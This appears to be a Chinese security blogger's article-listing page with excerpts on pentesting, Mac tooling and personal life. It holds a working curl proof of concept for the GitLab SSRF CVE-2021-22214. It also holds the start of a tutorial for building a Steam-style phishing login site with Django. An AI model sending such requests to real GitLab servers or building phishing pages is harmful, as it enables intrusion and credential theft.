易水哲发布的文章 - 赛博保安日志

CVE-2021-22214记录

一、前言我现在在某央企驻场，渗透测试工程师，也负责漏洞管理平台，也就是监测、渗透测试出现的漏洞，都会录入平台，走流程整改复测办结。二、漏洞详情1、漏洞简介GitLab存在前台未授权SSRF漏洞，未授权的攻击者也可以利用该漏洞执行SSRF攻击（CVE-2021-22214）。该漏洞源于对用户提供数据的验证不足，远程攻击者可通过发送特殊构造的 HTTP 请求，欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求。2、漏洞POC（1）命令行验证curl -s --show-error -H 'Content-Type: application/json' https://example.com/api/v4/ci/lint --data '{ "include_merged_yaml": true, "content": "include:\n remote: http://xx.xxx.xx.xx:port/api/v1/targets?test.yml"}'（2）burp发送包

网安·生命在于研究 · 2023-12-18 · 433 人浏览

2023年12月16日-北京市海底世界

时间：2023年12月16日地点：北京市军事博物馆，北京市海底世界人物：易水哲，阳一个人票价90元，但因为是预定当天的，所以每人115元门票。评价：整体可以，只有一层，较小，但可以大饱眼福，多呆一会。

生活 · 2023-12-17 · 211 人浏览

使用PD打开ovf格式虚拟机（MAC）

一、前言下载了一个封装的工具箱虚拟机，格式是OVA的，PD无法直接打开，之前成功转换后打开过，但那时候没有记录，今天记录一下。二、过程有两种方法1、去vmware官网下载工具VMware OVF Tool地址：https://code.vmware.com/web/tool/4.1.0/ovf登录账号，下载自己对应的平台：我使用的是mac，安装完成后会在应用程序里面。打开终端输入命令：ovftool --lax name1.ova name2.vmx然后等待转换完成即可。2、不使用工具，使用Vmware fusion中转首先使用vmware fusion打开ova的虚拟机，等待导入。然后他会转换成vmwarevm格式：然后直接可以使用PD打开，PD会提示转换，等待转换完成即可。注意：需要虚拟机为关闭状态。

文章·折腾·生命在于折腾 · 2023-12-15 · 244 人浏览

TV电视盒子渗透测试抓包设置

一、前言封面图是示例图，因为涉及到保密，所以本次测试的电视盒子不放出外观和设置界面。这一次要测试电视盒子，大家也都知道，市面上的电视盒子大部分都是Android，当然，要使用笔记本去抓电视盒子的数据包，也是一样的方法，加证书，设置代理。但电视盒子都有权限的，一般不开放的，所以要联系厂商获得授权。二、步骤1、取得adb的授权为了电视盒子的安全性，厂商都会把adb关闭的，要开启也可以，但必须使用厂商的注册机，通过获取直接的机器码，发送给厂商，获得许可证，才可以开启adb，所以如果自己没有授权去做渗透测试的话，拒绝！！！未经授权的渗透测试都是违法的！！！2、设置处于同一网络将电视盒子和笔记本连接至同一WiFi，此处电视盒子的IP假设为172.21.150.161。我本机的IP为172.21.150.162：3、测试连接我上一篇文章提到过macos安装adb，如果没有adb的话参考上一篇文章安装adb。命令：adb connect 172.21.150.161如果连接成功，会回显成功或者无回显。4、导出Burp证书5、将证书转换为pem格式这里要使用openssl工具，我的macos自带，没有

文章·信息安全学习·网安·生命在于学习 · 2023-12-13 · 217 人浏览

Android Studio网络配置（MAC）

一、前言在macos上面，能使用的android模拟器是真不如windows多，各个厂家似乎抛弃了macos的安卓模拟器，当然，我使用的mac是2019款16寸的inter芯片，之前使用arm架构M2芯片的时候，更是可怕，不过quem可以很好的支持安卓，反正现在我是一直用着Android Studio。二、配置客户要对一个app进行渗透测试，比较急，之前一直都是web渗透，我只好安装了Android Studio，新建了一个模拟器，至于如何新建模拟器，我简单标注一下：然后根据自己需求配置就好了。我很快就启动了系统，突然发现没有网络，一看DNS是10.0.2.3，这样是上不了网络的。通过查阅很多资料，发现都是零零散散的，无法解决我的问题，这里我就说一下应该如何从头到尾的去解决问题。三、解决方法1-3点是我从各个地方看到的一些解决办法，我都进行了尝试，我本人最终使用的是第4个方法。1、物理机IPV6更改为只允许本地这个我记得之前对我有用，这次没有用的。2、通过模拟器修改DHCP为静态，手动配置网络你可以尝试一下这种方法，记得IP要和原先一样。3、终端配置启动项启动进入cd /Users/用

文章·折腾·生命在于折腾 · 2023-12-04 · 553 人浏览

将心脏献给计算机

还记得当初自己为什么选择计算机？看到这个话题的时候，我害羞了，是的，你没有看错，我害羞了，这并不是说我有恋物癖，只是我对经过我手中的计算机，都有一种独特的情感。背景我是一名标准的00后，生于2000年，那年的电脑都是大脑袋，很笨重，我不认识她，但她可能在开具我出生证明的时候认识了我。当时，父亲是一名县城里中学的教师，当然，我整个家族有很多老师，他不是教什么课程的，而是什么课程都教，哪个班的老师有事上不了课，他就会挎着他的书去代课，但他主要还是负责学校计算机的。开端03年，我恋爱了，是的，03年的我3岁。不知从何时开始，父亲会骑着摩托带着我去他学校，我只记得那段路很远，路很窄，两旁有很高的松树，我趴在父亲宽厚的背上，双手揣进父亲的衣兜，感受着温暖，现在想想，我就像是去接新娘一样。第一次到他学校的情景我已经模糊不清了，我只记得学校里面有好多和蔼的叔叔阿姨，虽然我都不认识，但我也可以分出哪些是和父亲一样教书育人的老师，哪些是把守校门，一夫当关万夫莫开的门卫爷爷，还有创造美味食品的叔叔阿姨，至于读书的哥哥姐姐，我是真没印象了。然后我就在父亲的办公室见到了她，初次见面，我对她很好奇，不明白为什么

生活·生命在于折腾 · 2023-11-28 · 162 人浏览

主板跳线

一、前言好吧，又是一个我之前没接触过的东西，秉持遇到什么就学什么的精神，来学！我一发小来找我，问我关于跳线的事情，我就一个表情：好吧，我承认，纵观我23岁，18年计算机运维工作生涯，我没有接触过这个跳线，之前接触主机主要是大硬件，见到的机箱跳线都是接好的。二、主板跳线主板跳线是计算机组装过程中必须正确设置的一部分，它们连接了电源、开关、指示灯等各种元素。下面我们将详细介绍这些跳线的连接方法：1、电源开关连接线电源开关连接线通常标记为POWER SW，它连接了电源按钮和主板。按下电源按钮时，这个开关会发送一个信号到主板，通知主板启动计算机。2、复位开关连接线复位开关连接线通常标记为RESET SW，它连接了复位按钮和主板。当计算机出现问题，或者需要重新启动时，按下复位按钮将会重置计算机。3、电源指示灯连接线电源指示灯连接线通常标记为POWER LED，它连接了电源指示灯和主板。当计算机接通电源时，这个指示灯就会亮起。4、硬盘指示灯连接线硬盘指示灯连接线通常标记为HDD LED，它连接了硬盘指示灯和主板。当计算机的硬盘活动时，这个指示灯就会亮起。5、扬声器连接线扬声器连接线通常标记为SPE

折腾·生命在于学习 · 2023-09-12 · 101 人浏览

MacOS（Intel）渗透测试环境搭建

一、前景提要之前使用的是2022款M2芯片的MacBook Air 13寸，不得不说，是真的续航好，轻薄，刚开始我了解到M芯片的底层是ARM架构，我觉得可以接受，虚拟机用的不多，但在后续的使用过程中，发现卡脖子就是卡脖子，随后换了联想R9000K，背着上了一天班，发现太重了，于是又换了Xiaomi Boook Pro16。在工作的时候，同事说后面虚拟机可能是个大问题，我说没事，扩内存呗，结果发现是板载内存，我也懒得折腾了，直接上手这台机皇：2019款MacBook Pro 16寸，64G+4T+8G显存+i9处理器，直接顶配，这不来搭建渗透测试环境了。二、搭建过程1、安装常用软件a.必装软件QQ，微信，钉钉，腾讯会议，抖音，WPS，酷狗音乐，Google Chrome，百度网盘，小猫。b.生产力软件Picsee：看图工具。Bob：截图翻译工具。Notability，GoodNotes：笔记软件。Parallels Desktop：虚拟机软件。iSho Pro：截图软件。超级右键专业版：右键扩展。Magnet：窗口管理工具。Maccy：剪贴板工具。Typora，Sublime Text：

网安·折腾 · 2023-07-31 · 306 人浏览

Fishing软件的编写（Python+Django）

==注意：本篇文章仅用于学习交流，不得用于其他用途。==一、Django简介Django是一个开放源代码的Web应用框架，由Python写成。采用了MTV的框架模式，即模型M，视图V和模版T。它最初是被开发来用于管理劳伦斯出版集团旗下的一些以新闻内容为主的网站的，即是CMS（内容管理系统）软件。二、安装Django模块pip3 install django==3.0三、创建Django项目django-admin startproject steam_web 四、创建子应用cd steam_web python3 manage.py startapp login完成后会生成一个login的文件夹。这个文件夹下我们需要用到models.py（数据模型）和view.py（用来控制页面逻辑）五、查看环境是否配置成功使用pycharm打开这个项目，然后运行。打开这个链接，发现成功：六、修改setting.py文件配置网站默认语言、时间刷新页面就变成中文了。七、导入所需文件这里把你想使用的网站扒下来，然后修改配置文件。还需要更改html对应的参数。八、编写数据模型打开models.py文件，去创

网安·生命在于折腾 · 2023-07-18 · 270 人浏览

Obsidian笔记软件折腾记录（一）

一、开端我使用过很多笔记软件，OneNote-语雀-Notability-GoodNotes-印象笔记-有道云笔记。不得不说，我一直想拥有一款满足以下条件的笔记软件：买断制。（符合以下所有条件我考虑订阅）ipad可手写。icloud可同步。Mac端可打字。可多级分类。阅读PDF很舒服。暂无。说实话，大部分软件我的体验都不是很好，总有那么几个点很难让我当做唯一的笔记软件。（什么时候Notability可以把电脑端打字崩溃修复好？）现在我想试一试这个Obsidian，我曾经折腾过一段时间，但没有正式投入我的工作学习中，希望这次可以给我一点惊喜。==我写上面这些字的时候是凌晨00:37，别问我为什么，因为吃饱了撑的，我是肚子真饱饱的。==二、折腾1、先折腾Mac端https://obsidian.md/下载好，初次打开可以选择语言，选择简体中文可以看到以下提示：这里我选择了新建仓库，起个名字，然后选择了icloud的位置。然后在软件中新建一个文件夹，新建一些笔记。可以看到是支持多级目录的，文件夹也可以嵌套文件夹。2、折腾ipad打开ipad应用商店，搜索可以看到此款软件，下载后打开打开后选择

折腾·生命在于折腾 · 2023-06-14 · 107 人浏览